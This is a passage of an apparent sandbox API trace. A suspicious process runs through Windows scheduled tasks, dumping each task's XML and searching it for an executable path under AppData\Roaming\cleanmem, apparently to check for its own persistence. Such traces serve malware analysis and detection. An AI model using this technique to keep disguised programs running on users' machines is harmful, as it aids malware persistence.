\r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n {A9A33436-678B-4C9C-A211-7CC38785E79D}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.882] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.882] IUnknown:Release (This=0x126ff0) returned 0x0 [0138.882] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126ff0) returned 0x0 [0138.883] ITaskFolderCollection:get_Count (in: This=0x126ff0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.883] IUnknown:Release (This=0x126ff0) returned 0x0 [0138.883] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.883] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.883] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126ff0) returned 0x0 [0138.917] IRegisteredTaskCollection:get_Count (in: This=0x126ff0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=21) returned 0x0 [0138.917] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.917] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="ActivateWindowsSearch") returned 0x0 [0138.917] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ActivateWindowsSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoActivateWindowsSearch\r\n \r\n \r\n") returned 0x0 [0138.919] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ActivateWindowsSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoActivateWindowsSearch\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.920] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.920] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.920] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="ConfigureInternetTimeService") returned 0x0 [0138.920] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoConfigureInternetTimeService\r\n \r\n \r\n") returned 0x0 [0138.922] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoConfigureInternetTimeService\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.922] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.922] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.923] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="DispatchRecoveryTasks") returned 0x0 [0138.923] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n true\r\n Parallel\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRecoveryTasks $(Arg0)\r\n \r\n \r\n") returned 0x0 [0138.925] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n true\r\n Parallel\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRecoveryTasks $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.925] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.925] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.925] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="ehDRMInit") returned 0x0 [0138.925] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ehDRMInit\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DRMInit\r\n \r\n \r\n") returned 0x0 [0138.927] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ehDRMInit\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DRMInit\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.928] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.928] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.928] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="InstallPlayReady") returned 0x0 [0138.928] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\InstallPlayReady\r\n 2008-02-08T15:02:27.7076832\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /InstallPlayReady $(Arg0)\r\n \r\n \r\n") returned 0x0 [0138.930] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\InstallPlayReady\r\n 2008-02-08T15:02:27.7076832\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /InstallPlayReady $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.930] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.930] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.930] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="mcupdate") returned 0x0 [0138.930] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\mcupdate\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-125)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-126)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0138.932] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\mcupdate\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-125)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-126)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.933] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.933] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.933] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="MediaCenterRecoveryTask") returned 0x0 [0138.933] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-137)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-138)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -MediaCenterRecoveryTask\r\n \r\n \r\n {23E5D772-327A-42f5-BDEE-C65C6796BB2A}\r\n \r\n \r\n \r\n") returned 0x0 [0138.935] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-137)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-138)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -MediaCenterRecoveryTask\r\n \r\n \r\n {23E5D772-327A-42f5-BDEE-C65C6796BB2A}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.935] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.935] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.936] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="ObjectStoreRecoveryTask") returned 0x0 [0138.936] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-131)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-132)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -ObjectStoreRecoveryTask\r\n \r\n \r\n {177AFECE-9599-46cf-90D7-68EC9EEB27B4}\r\n \r\n \r\n \r\n") returned 0x0 [0138.938] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-131)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-132)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -ObjectStoreRecoveryTask\r\n \r\n \r\n {177AFECE-9599-46cf-90D7-68EC9EEB27B4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.938] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.938] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.938] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="OCURActivate") returned 0x0 [0138.938] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURActivate\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURActivate\r\n \r\n \r\n") returned 0x0 [0138.940] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURActivate\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURActivate\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.940] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.941] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.941] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="OCURDiscovery") returned 0x0 [0138.941] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURDiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURDiscovery $(Arg0)\r\n \r\n \r\n") returned 0x0 [0138.943] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURDiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURDiscovery $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.943] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.943] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.943] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="PBDADiscovery") returned 0x0 [0138.943] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0138.945] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.946] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.946] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.946] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="PBDADiscoveryW1") returned 0x0 [0138.946] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW1\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:7 /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0138.948] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW1\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:7 /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.949] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.949] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.949] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="PBDADiscoveryW2") returned 0x0 [0138.949] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW2\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:90 /PBDADiscovery\r\n \r\n 